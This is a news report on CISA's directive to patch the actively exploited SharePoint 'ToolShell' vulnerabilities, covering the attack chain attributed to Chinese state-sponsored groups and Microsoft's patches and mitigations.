The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent directive for federal agencies to address critical vulnerabilities in Microsoft SharePoint, following active exploitation by Chinese state-sponsored hacking groups. On July 22, 2025, CISA added two specific flaws—CVE-2025-49704 and CVE-2025-49706—to its Known Exploited Vulnerabilities (KEV) catalog, mandating remediation by July 23, 2025.
These vulnerabilities, collectively referred to as ToolShell, consist of a spoofing flaw (CVE-2025-49706) and a remote code execution (RCE) flaw (CVE-2025-49704). Exploitation of these flaws enables unauthorized access to on-premises SharePoint servers, allowing attackers to execute arbitrary code and potentially gain full control over affected systems. Microsoft has identified that Chinese hacking groups, including Linen Typhoon and Violet Typhoon, have been leveraging these vulnerabilities since July 7, 2025.
The attack chain typically involves exploiting these SharePoint flaws to deploy a web shell, which facilitates the retrieval and theft of MachineKey data. This data can then be used to impersonate users and escalate privileges within the network. Symantec has observed post-exploitation activities where attackers execute encoded PowerShell commands to download malicious executables disguised as benign files, such as debug.js, to evade detection.
In response to these threats, Microsoft has released security updates to address the vulnerabilities. Administrators are strongly advised to apply these patches immediately to mitigate the risk of exploitation. Additionally, enabling the Antimalware Scan Interface (AMSI) is recommended as a mitigation step to prevent unauthenticated attacks. However, security researchers have noted that AMSI is not a comprehensive solution, and organizations should not solely rely on it for protection.
The urgency of this situation underscores the critical need for organizations to maintain up-to-date security measures and promptly apply patches to known vulnerabilities. Failure to do so can result in significant security breaches, data theft, and potential operational disruptions.
